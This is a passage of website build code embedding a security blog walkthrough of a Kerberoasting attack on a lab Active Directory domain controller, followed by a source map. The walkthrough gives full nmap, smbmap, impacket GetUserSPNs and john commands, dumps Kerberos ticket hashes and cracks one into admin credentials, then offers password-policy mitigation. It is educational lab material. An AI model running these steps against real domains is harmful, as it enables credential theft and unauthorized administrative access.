\",/*#__PURE__*/e(\"code\",{children:\"IP\"}),\" of our target server is \",/*#__PURE__*/e(\"code\",{children:\"192.168.56.2\"}),\", the domain is \",/*#__PURE__*/e(\"code\",{children:\"sky.net\"}),\" and our low privilege domain credentials are \",/*#__PURE__*/e(\"code\",{children:\"kertest:SuperSecure@123!!!\"}),\".\"]}),/*#__PURE__*/e(\"p\",{children:\"We are ready to go.\"}),/*#__PURE__*/e(\"h2\",{children:\"Scanning our server\"}),/*#__PURE__*/t(\"p\",{children:[\"First we need to check the server ports. We can use \",/*#__PURE__*/e(\"code\",{children:\"nmap\"}),\" or \",/*#__PURE__*/e(\"code\",{children:\"ncat\"}),\" to do it.\"]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"port scanning.\"})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"nmap 192.168.56.2\\nncat -vz 192.168.56.2 88\\nncat -vz 192.168.56.2 445\",language:\"Shell\"})})}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"nmap.\"})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"# Nmap 7.70 scan initiated Tue Aug  6 17:10:43 2019 as: nmap 192.168.56.2\\nNmap scan report for 192.168.56.2\\nHost is up (0.012s latency).\\nNot shown: 991 filtered ports\\nPORT     STATE SERVICE\\n53/tcp   open  domain\\n88/tcp   open  kerberos-sec\\n135/tcp  open  msrpc\\n139/tcp  open  netbios-ssn\\n389/tcp  open  ldap\\n445/tcp  open  microsoft-ds\\n464/tcp  open  kpasswd5\\n3268/tcp open  globalcatLDAP\\n3389/tcp open  ms-wbt-server\\n# Nmap done at Tue Aug  6 17:10:54 2019 -- 1 IP address (1 host up) scanned in 10.54 seconds\",language:\"Shell\"})})}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"nc.\"})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"192.168.56.2: inverse host lookup failed: Unknown host\\n(UNKNOWN) [192.168.56.2] 88 (kerberos) open\\n192.168.56.2: inverse host lookup failed: Unknown host\\n(UNKNOWN) [192.168.56.2] 445 (microsoft-ds) open\",language:\"Shell\"})})}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"Kerberos\"}),\" runs on \",/*#__PURE__*/e(\"code\",{children:\"port 88\"}),\" and \",/*#__PURE__*/e(\"code\",{children:\"SMB\"}),\" runs on \",/*#__PURE__*/e(\"code\",{children:\"port 445\"}),\"; we are going to use these services to attack the Domain Controller.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Then using \",/*#__PURE__*/e(\"code\",{children:\"smbmap\"}),\" we can check our permissions on the server.\"]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"samba low privileges.\"})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"smbmap -u kertest -p 'SuperSecure@123!!!' -H 192.168.56.2 -d sky.net\",language:\"Shell\"})})}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"smbmap low.\"})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"[+] Finding open SMB ports....\\n[+] User SMB session established on 192.168.56.2...\\n[+] IP: 192.168.56.2:445        Name: 192.168.56.2\\n        Disk                                                    Permissions\\n        ----                                                    -----------\\n        ADMIN$                                                  NO ACCESS\\n        C$                                                      NO ACCESS\\n        IPC$                                                    READ ONLY\\n        NETLOGON                                                READ ONLY\\n        SYSVOL                                                  READ ONLY\",language:\"Shell\"})})}),/*#__PURE__*/e(\"p\",{children:\"As we can see, our user is a valid domain user, but has no permissions on the server.\"}),/*#__PURE__*/e(\"h2\",{children:\"Kerberoasting\"}),/*#__PURE__*/t(\"p\",{children:[\"Given that we have an active user we can exploit \",/*#__PURE__*/e(\"code\",{children:\"kerberoast\"}),\" to retrieve \",/*#__PURE__*/e(\"code\",{children:\"TGTs\"}),\". This is done by simply running:\"]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"kerberoast attack.\"})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"impacket/examples$ python GetUserSPNs.py sky.net/kertest -dc-ip 192.168.56.2 -save\",language:\"Shell\"})})}),/*#__PURE__*/t(\"p\",{children:[\"And when prompted put the password \",/*#__PURE__*/e(\"code\",{children:\"SuperSecure@123!!!\"}),\".\"]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"kerberoast output.\"})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"ServicePrincipalName Name MemberOf PasswordLastSet LastLogon\\n\\nsky.net/kertest kertest CN=Users,CN=Builtin,DC=sky,DC=net 2019-08-06 17:06:03 2019-08-06 17:31:20\\nsky.net/svctest svctest CN=Administrators,CN=Builtin,DC=sky,DC=net 2019-08-06 17:06:03 <never>\\n\\n\\n$krb5tgs$23$*kertest$SKY.NET$sky.net/kertest*$1639e200b950b6e566adad2ce3f3a336$bf5092143c33b1664dc4adb9186ea7f1f29cb0919e4cccc11316fc0824b72cab3c3d573f477c81cbb659d64bb0e156c15796180bbf96cbee9d8e7df8438c449a4aacc8714aec2291ff5d470c6be6dfa2f8844d6c34805e0e56b94d8835efce3faa89ca11972f50cace1929b14ee4491ac82a39623cde0ac85f4af8f11284e968dcd96c6219836a7554b42ab2b1d14c6ca2c9d72416463ad939c180c3c8aea73adcb7985035460bf9cb76f12a4d39d5d5ff05a476262f8505c2bba5e9b24e970214abf6a3af02122f815789a82b7919131b72759f93d1404df918cadf64a265a96ebb5a52794b5b7a6d9460ae0db3a0eaa61b7c79e13a18b97f6fe0bcbfdc199fe57138cc5a28deeb06ecd1fae3d4b2af36378f914eac31832f31a050b7dfb96b79419e20df1b37bc04359590f98e0d51066b54353f61f0a9b406e360ce6cd1f118e564a8fe2bc13c787112167bfccb09ba87af8300563fe8051b4e7ecb260a5af5555308f7cced77327214816201b352d186b2247741e88c2ddd207a59f7f6c4e9aa8f28656e343c1cff65bfb0105e77829613ae766d65c4b31b5f48b3cd47e2d1283b4e37db154c6912057929debd05d1abcbc62af9ec99e787e267cd9e666514504d1d64f34347e5c87f6574d08c205a61a59679854f99db94d43abf4ce3752b24d2b1675a9fd94a9365bc36b67cd86e5e99187d0343cbf71de778411a4e696ce41af8cc47dfd82e8072d2821acee41a95560d2d9d2f84d96bf70d982899dce15e2b5785ed17adde1e1886fbcecea00f57af983213e489479da2182efffdfbf652029c199de60ecc3dc7044f5d2a36a4e8c09dac9f438695d25044ce49e04a906064c16c3e9b9bff1accbe378812cb8ee2266b4a4521cf0f37cbd92fb24227e6316881abc7f79438dd0e5f53b21b830f9b662fb5f0047f1ff710804c38c64376d53731184d8acaa0679c5657b0a5b9aa08bb9539c79d7a445ba93d8ee7297788c1363d8846613de4654ea04d82599d1442c311980dad4fb14a2b6864c1fa831b3bbf6e7c05d3526ecb7470c3b9781a06845c59c5eaf366d99d18cd3f2ae265847b2b013674d874ae584d41a9cc1c5f2b76d17657ab9f4f13f0895fec63973c82a2b8296b3dc6a0bfd6fba9d71c081ed71641f283fd157884f70478c46e73aea8813fc758b3c4d26927a052d754a57682c387f132729e5373bf7fbcd7c724182861d5d7dcd53dfad7bf6cf77838063ddae770ef84de21391acd30bef3fd24\\n$krb5tgs$23$*svctest$SKY.NET$sky.net/svctest*$0fb0da3f22933a2893a6dac63e87538d$d11bb41bc5f41eeb4890ae74c42bff3ac203c649ef9740e70edb67113723df962b20c1346d82c7e410932944c881d3cb06a7cec0c21278ac1eeb2184867640f39b1ae725c02429ec9068fc6688102d576e4efb9c435f4207882601bff28414ababa2423cc4ea82d64082d8fe4eee797568dd514b4081a5338c08dd279fef2a3ade69efc2fe5502fd0a8e8cd8187761ff4c05322c00484e001832a28242d0c821ce44230eac54e2e4e36c365303ea729505ac9d35d7cc08077d07ea36c72e7ab12a04af392eeddcff37fd2e8a066e779ae26e0658ffa25f35a5c64f456a794676819dda35fe56514c1293f561750532d36a395069c8e98581f2b5d216254d7bed07e95dea36a4817ead880fe405711dae771e1660cadf3902fda1e0b730386aa02bc13bc8051ede7ee5388a919a4c20652ef241c47d66e21d026f5233bbd81dee6f01ad3887c32a9f4f0ab312939edcafa386eba04c32a0826f59b4009bd7fee5f6d78bcdeec80095fb1d0f189a87c26310b562bc4d94ffd19201a0bfa06a208d837a52bade076c2b34b8807f74bf51927b774e9f5047289d0d529beb58712d8eee673db3c77d28882a51bbfcf8dba96677af3b43a109c36b335b70dd0e316cce18877b7704e1ed837875cde1e7a462e35c9fe972318eb6d6d37ea222f00d5e81df343edfc1f50bd8907876c4dc1e77f01d9f5df3cb9e94f231a7a0eeb93aa62c22814742b06596eeb72824b4b0449cf6555fa020345bc21a84595437d50abb7cbe4287f580e47ed302faa9de47b68e9c3cab79ad2b1da17548f39aa8ace12372cb0d9952caee715535654f1f918ad5be3432b954bd7bae753152d919bcb93771fc9daf371ce724b18979f5180955d9ba6573d98f1042df80e5e7532fa96629e1b69f9e556df142fd8b0858243144c9f48a19d1933f280f8366c749fe6fb2b7b6c5f7781994f4d3f32552085ebc35ee4fa122a33978c32e877c0b48bc0cb19840bb7d349bbefb39ef1d062fc901b461a480e92e6121b3060f17c34fe92abad77ffebf687115da10b07081d35ef4a622916b656dd84c92643d477128d0a74a24ab23f69f61c94a7b0483313a31476cedc44a5c9efc55b18c57ebea38984f00e50d5773e25f7c6b3bcbc5ef73bf255ede5397ae334a72409440f8475b1f8b22730a456f81e6b08402c7c795aad026c01ca31b4fd8aac5bade44552787aec9c6b2407d2da24059014efdd88ee1953183f62b2e5e06ed7841438a7d4bd3635672b2\",language:\"Shell\"})})}),/*#__PURE__*/t(\"p\",{children:[\"Here we have our \",/*#__PURE__*/e(\"code\",{children:\"TGTs\"}),\", they are \",/*#__PURE__*/e(\"code\",{children:\"krbtgt hashes\"}),\", and there we can view another user on the server \",/*#__PURE__*/e(\"code\",{children:\"svctest\"}),\". With this, we save that user’s \",/*#__PURE__*/e(\"code\",{children:\"TGT\"}),\" on a file.\"]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"save hash.\"})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"echo '$krb5tgs$23$*svctest$SKY.NET$sky.net/svctest*$0fb0da3f22933a2893a6dac63e87538d$d11bb41bc5f41eeb4890ae74c42bff3ac203c649ef9740e70edb67113723df962b20c1346d82c7e410932944c881d3cb06a7cec0c21278ac1eeb2184867640f39b1ae725c02429ec9068fc6688102d576e4efb9c435f4207882601bff28414ababa2423cc4ea82d64082d8fe4eee797568dd514b4081a5338c08dd279fef2a3ade69efc2fe5502fd0a8e8cd8187761ff4c05322c00484e001832a28242d0c821ce44230eac54e2e4e36c365303ea729505ac9d35d7cc08077d07ea36c72e7ab12a04af392eeddcff37fd2e8a066e779ae26e0658ffa25f35a5c64f456a794676819dda35fe56514c1293f561750532d36a395069c8e98581f2b5d216254d7bed07e95dea36a4817ead880fe405711dae771e1660cadf3902fda1e0b730386aa02bc13bc8051ede7ee5388a919a4c20652ef241c47d66e21d026f5233bbd81dee6f01ad3887c32a9f4f0ab312939edcafa386eba04c32a0826f59b4009bd7fee5f6d78bcdeec80095fb1d0f189a87c26310b562bc4d94ffd19201a0bfa06a208d837a52bade076c2b34b8807f74bf51927b774e9f5047289d0d529beb58712d8eee673db3c77d28882a51bbfcf8dba96677af3b43a109c36b335b70dd0e316cce18877b7704e1ed837875cde1e7a462e35c9fe972318eb6d6d37ea222f00d5e81df343edfc1f50bd8907876c4dc1e77f01d9f5df3cb9e94f231a7a0eeb93aa62c22814742b06596eeb72824b4b0449cf6555fa020345bc21a84595437d50abb7cbe4287f580e47ed302faa9de47b68e9c3cab79ad2b1da17548f39aa8ace12372cb0d9952caee715535654f1f918ad5be3432b954bd7bae753152d919bcb93771fc9daf371ce724b18979f5180955d9ba6573d98f1042df80e5e7532fa96629e1b69f9e556df142fd8b0858243144c9f48a19d1933f280f8366c749fe6fb2b7b6c5f7781994f4d3f32552085ebc35ee4fa122a33978c32e877c0b48bc0cb19840bb7d349bbefb39ef1d062fc901b461a480e92e6121b3060f17c34fe92abad77ffebf687115da10b07081d35ef4a622916b656dd84c92643d477128d0a74a24ab23f69f61c94a7b0483313a31476cedc44a5c9efc55b18c57ebea38984f00e50d5773e25f7c6b3bcbc5ef73bf255ede5397ae334a72409440f8475b1f8b22730a456f81e6b08402c7c795aad026c01ca31b4fd8aac5bade44552787aec9c6b2407d2da24059014efdd88ee1953183f62b2e5e06ed7841438a7d4bd3635672b2' > hashkerber\",language:\"Shell\"})})}),/*#__PURE__*/t(\"p\",{children:[\"And then we crack it using \",/*#__PURE__*/e(\"code\",{children:\"john\"}),\", a \",/*#__PURE__*/e(\"code\",{children:\"SecLists\"}),\" dictionary, and \",/*#__PURE__*/e(\"code\",{children:\"KoreLogic\"}),\" ruleset.\"]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"john cracking.\"})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"john --wordlist=/usr/share/seclists/Passwords/darkweb2017-top100.txt --rules=KoreLogic hashkerber\",language:\"Shell\"})})}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"john output.\"})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"Using default input encoding: UTF-8\\nLoaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])\\nWill run 2 OpenMP threads\\nPress 'q' or Ctrl-C to abort, almost any other key for status\\nMonkey.123       (?)\\n1g 0:00:01:09 DONE (2019-08-06 17:15) 0.01446g/s 150941p/s 150941c/s 150941C/s Michae.l118..Asdfgh.jkl24\\nUse the \\\"--show\\\" option to display all of the cracked passwords reliably\\nSession completed\",language:\"Shell\"})})}),/*#__PURE__*/t(\"p\",{children:[\"And it’s cracked! Now we can check our access running \",/*#__PURE__*/e(\"code\",{children:\"smbmap\"}),\" again with our new set of credentials.\"]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"samba high privileges.\"})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"smbmap -u svctest -p 'Monkey.123' -d sky.net -H 192.168.56.2\",language:\"Shell\"})})}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"admin smbmap.\"})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:\"[+] Finding open SMB ports....\\n[+] User SMB session established on 192.168.56.2...\\n[+] IP: 192.168.56.2:445        Name: 192.168.56.2\\n        Disk                                                    Permissions\\n        ----                                                    -----------\\n        ADMIN$                                                  READ, WRITE\\n        C$                                                      READ, WRITE\\n        IPC$                                                    READ ONLY\\n        NETLOGON                                                READ, WRITE\\n        SYSVOL                                                  READ, WRITE\\n        [!] Unable to remove test directory at \\\\\\\\192.168.56.2\\\\SYSVOL\\\\edWFuwvkCb, plreae remove manually\",language:\"Shell\"})})}),/*#__PURE__*/t(\"p\",{children:[\"As you can see, we now have administrative access on our server. You can access it by \",/*#__PURE__*/e(\"code\",{children:\"RDP\"}),\" or retrieve files using \",/*#__PURE__*/e(\"code\",{children:\"SMB\"}),\". Also, you can dump the \",/*#__PURE__*/e(\"code\",{children:\"SAM\"}),\" to get more users and hashes, these last ones are \",/*#__PURE__*/e(\"code\",{children:\"NTLMv1\"}),\" and easily cracked.\"]}),/*#__PURE__*/e(\"p\",{children:\"Here is the exploitation process.\"}),/*#__PURE__*/e(\"h2\",{children:\"Solution\"}),/*#__PURE__*/e(\"p\",{children:\"There is no easy solution because this attack exploits the same legitimate protocol Kerberos uses. Any user in the domain can exploit this vulnerability and it is only a matter of time before they crack the credentials.\"}),/*#__PURE__*/e(\"p\",{children:\"The way to mitigate this is by having and using a strong credential policy. Passwords must be longer than 20 characters, contain upper and lower case letters, contain symbols and digits and must not be easy to guess. This means you would be wise to adopt passphrases instead of simple passwords.\"}),/*#__PURE__*/e(\"p\",{children:\"This is especially useful when you are dealing with service credentials because they are the ones most targeted. You can also set an alert to notify you when someone is logged in with your most critical and high-privileged users.\"}),/*#__PURE__*/t(\"p\",{children:[\"If you want more information about strong credentials, you can check our \",/*#__PURE__*/e(a,{href:\"https://help.fluidattacks.com/portal/en/kb/criteria/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:/*#__PURE__*/e(\"strong\",{children:\"Criteria\"})})}),\" about them.\"]})]});\nexport const __FramerMetadata__ = {\"exports\":{\"richText5\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText1\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText3\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText15\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText4\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText14\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText2\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText9\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText6\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText10\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText13\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText7\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText12\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText8\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText11\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"__FramerMetadata__\":{\"type\":\"variable\"}}}"],"mappings":"udACa,AADb,GAAkD,IAA4D,IAAuC,IAAwB,IAA4G,CAAa,EAAsB,EAAA,EAAa,CAAC,SAAS,CAAc,EAAE,KAAK,CAAC,SAAS,qBAAsB,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,CAAC,2MAA0O,EAAEA,EAAE,CAAC,KAAK,0DAA0D,aAAa,EAAE,OAAO,YAAY,cAAc,EAAE,UAAU,CAAE,EAAC,QAAQ,oBAAoB,cAAc,EAAE,SAAsB,EAAEC,EAAE,EAAE,CAAC,SAAS,oBAA2B,EAAC,AAAC,EAAC,CAAC,kBAA+B,EAAED,EAAE,CAAC,KAAK,iDAAiD,aAAa,EAAE,OAAO,YAAY,cAAc,EAAE,UAAU,CAAE,EAAC,QAAQ,oBAAoB,cAAc,EAAE,SAAsB,EAAEC,EAAE,EAAE,CAAC,SAAS,qBAAyB,EAAC,AAAC,EAAC,CAAC,sHAAsI,EAAE,KAAK,CAAC,SAAS,UAAW,EAAC,CAAC,wEAA4E,CAAC,EAAC,CAAc,EAAE,MAAM,CAAC,IAAI,iBAAiB,UAAU,eAAe,OAAO,MAAM,IAAI,sEAAsE,OAAO,oQAAoQ,MAAM,CAAC,YAAY,YAAa,EAAC,MAAM,KAAM,EAAC,CAAc,EAAE,KAAK,CAAC,SAAS,CAAC,oCAAiD,EAAED,EAAE,CAAC,KAAK,2DAA2D,aAAa,EAAE,OAAO,YAAY,cAAc,EAAE,UAAU,CAAE,EAAC,QAAQ,oBAAoB,cAAc,EAAE,SAAsB,EAAEC,EAAE,EAAE,CAAC,SAAS,MAAU,EAAC,AAAC,EAAC,CAAC,IAAK,CAAC,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,CAAC,wGAAwH,EAAE,KAAK,CAAC,SAAS,UAAW,EAAC,CAAC,qNAAkO,CAAC,EAAC,CAAc,EAAE,KAAK,CAAC,SAAS,CAAC,kCAA+C,EAAE,KAAK,CAAC,SAAS,UAAW,EAAC,CAAC,SAAU,CAAC,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,CAAC,0FAAuG,EAAE,KAAK,CAAC,SAAS,UAAW,EAAC,CAAC,6KAAuL,CAAC,EAAC,CAAc,EAAE,MAAM,CAAC,IAAI,OAAO,UAAU,eAAe,OAAO,MAAM,IAAI,uEAAuE,OAAO,uQAAuQ,MAAM,CAAC,YAAY,aAAc,EAAC,MAAM,KAAM,EAAC,CAAc,EAAE,KAAK,CAAC,SAAS,CAAC,kCAA+C,EAAE,KAAK,CAAC,SAAS,UAAW,EAAC,CAAC,sBAAmC,EAAED,EAAE,CAAC,KAAK,+FAA+F,aAAa,EAAE,OAAO,YAAY,cAAc,EAAE,UAAU,CAAE,EAAC,QAAQ,oBAAoB,cAAc,EAAE,SAAsB,EAAEC,EAAE,EAAE,CAAC,SAAS,MAAU,EAAC,AAAC,EAAC,CAAC,IAAK,CAAC,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,gSAA6S,EAAC,CAAc,EAAE,KAAK,CAAC,SAAS,CAAc,EAAE,KAAK,CAAC,kBAAkB,IAAI,SAAsB,EAAE,IAAI,CAAC,SAAS,CAAc,EAAED,EAAE,CAAC,KAAK,iEAAiE,aAAa,EAAE,OAAO,YAAY,cAAc,EAAE,UAAU,CAAE,EAAC,QAAQ,oBAAoB,cAAc,EAAE,SAAsB,EAAEC,EAAE,EAAE,CAAC,SAAS,wBAAyB,EAAC,AAAC,EAAC,CAAC,GAAI,CAAC,EAAC,AAAC,EAAC,CAAc,EAAE,KAAK,CAAC,kBAAkB,IAAI,SAAsB,EAAE,IAAI,CAAC,SAAS,CAAc,EAAED,EAAE,CAAC,KAAK,8CAA8C,aAAa,EAAE,OAAO,YAAY,cAAc,EAAE,UAAU,CAAE,EAAC,QAAQ,oBAAoB,cAAc,EAAE,SAAsB,EAAEC,EAAE,EAAE,CAAC,SAAS,oDAAwD,EAAC,AAAC,EAAC,CAAC,GAAI,CAAC,EAAC,AAAC,EAAC,CAAc,EAAE,KAAK,CAAC,kBAAkB,IAAI,SAAsB,EAAE,IAAI,CAAC,SAAS,CAAc,EAAED,EAAE,CAAC,KAAK,wCAAwC,aAAa,EAAE,OAAO,YAAY,cAAc,EAAE,UAAU,CAAE,EAAC,QAAQ,oBAAoB,cAAc,EAAE,SAAsB,EAAEC,EAAE,EAAE,CAAC,SAAS,wCAA4C,EAAC,AAAC,EAAC,CAAC,GAAI,CAAC,EAAC,AAAC,EAAC,AAAC,CAAC,EAAC,CAAc,EAAE,MAAM,CAAC,IAAI,eAAe,UAAU,eAAe,OAAO,MAAM,IAAI,qEAAqE,OAAO,iQAAiQ,MAAM,CAAC,YAAY,YAAa,EAAC,MAAM,KAAM,EAAC,CAAc,EAAE,KAAK,CAAC,SAAS,CAAC,iDAA8D,EAAED,EAAE,CAAC,KAAK,6DAA6D,aAAa,EAAE,OAAO,YAAY,cAAc,EAAE,UAAU,CAAE,EAAC,QAAQ,oBAAoB,cAAc,EAAE,SAAsB,EAAEC,EAAE,EAAE,CAAC,SAAS,MAAU,EAAC,AAAC,EAAC,CAAC,IAAK,CAAC,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,mIAAuI,EAAC,CAAc,EAAE,KAAK,CAAC,SAAS,sBAA6B,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,mFAAoF,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,CAAc,EAAE,SAAS,CAAC,SAAS,sBAAuB,EAAC,CAAC,mRAA6R,CAAC,EAAC,CAAc,EAAE,KAAK,CAAC,SAAS,CAAc,EAAE,KAAK,CAAC,kBAAkB,IAAI,SAAsB,EAAE,IAAI,CAAC,SAAS,CAAc,EAAE,SAAS,CAAC,SAAS,iBAAqB,EAAC,CAAC,iIAA2I,CAAC,EAAC,AAAC,EAAC,CAAc,EAAE,KAAK,CAAC,kBAAkB,IAAI,SAAsB,EAAE,IAAI,CAAC,SAAS,CAAc,EAAE,SAAS,CAAC,SAAS,WAAe,EAAC,CAAC,wJAAqK,CAAC,EAAC,AAAC,EAAC,CAAc,EAAE,KAAK,CAAC,kBAAkB,IAAI,SAAsB,EAAE,IAAI,CAAC,SAAS,CAAc,EAAE,SAAS,CAAC,SAAS,UAAW,EAAC,CAAC,kQAAyQ,CAAC,EAAC,AAAC,EAAC,AAAC,CAAC,EAAC,CAAc,EAAE,MAAM,CAAC,IAAI,qBAAqB,UAAU,eAAe,OAAO,MAAM,IAAI,sEAAsE,OAAO,oQAAoQ,MAAM,CAAC,YAAY,YAAa,EAAC,MAAM,KAAM,EAAC,CAAc,EAAE,KAAK,CAAC,SAAS,CAAC,4EAAyF,EAAED,EAAE,CAAC,KAAK,8FAA8F,aAAa,EAAE,OAAO,YAAY,cAAc,EAAE,UAAU,CAAE,EAAC,QAAQ,oBAAoB,cAAc,EAAE,SAAsB,EAAEC,EAAE,EAAE,CAAC,SAAS,MAAU,EAAC,AAAC,EAAC,CAAC,IAAK,CAAC,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,CAAC,UAAuB,EAAED,EAAE,CAAC,KAAK,wIAAwI,aAAa,EAAE,OAAO,YAAY,cAAc,EAAE,UAAU,CAAE,EAAC,QAAQ,oBAAoB,cAAc,EAAE,SAAsB,EAAEC,EAAE,EAAE,CAAC,SAAS,cAAe,EAAC,AAAC,EAAC,CAAC,qXAA+X,CAAC,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,uXAA0Y,EAAC,CAAc,EAAE,MAAM,CAAC,IAAI,8BAA8B,UAAU,eAAe,OAAO,MAAM,IAAI,uEAAuE,OAAO,uQAAuQ,MAAM,CAAC,YAAY,YAAa,EAAC,MAAM,KAAM,EAAC,CAAc,EAAE,KAAK,CAAC,SAAS,CAAC,kFAA+F,EAAED,EAAE,CAAC,KAAK,gIAAgI,aAAa,EAAE,OAAO,YAAY,cAAc,EAAE,UAAU,CAAE,EAAC,QAAQ,oBAAoB,cAAc,EAAE,SAAsB,EAAEC,EAAE,EAAE,CAAC,SAAS,MAAU,EAAC,AAAC,EAAC,CAAC,IAAK,CAAC,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,qOAA+O,EAAC,CAAc,EAAE,IAAI,CAAC,SAAS,CAAC,SAAyB,EAAED,EAAE,CAAC,KAAK,oHAAoH,aAAa,EAAE,OAAO,YAAY,cAAc,EAAE,UAAU,CAAE,EAAC,QAAQ,oBAAoB,cAAc,EAAE,SAAsB,EAAEC,EAAE,EAAE,CA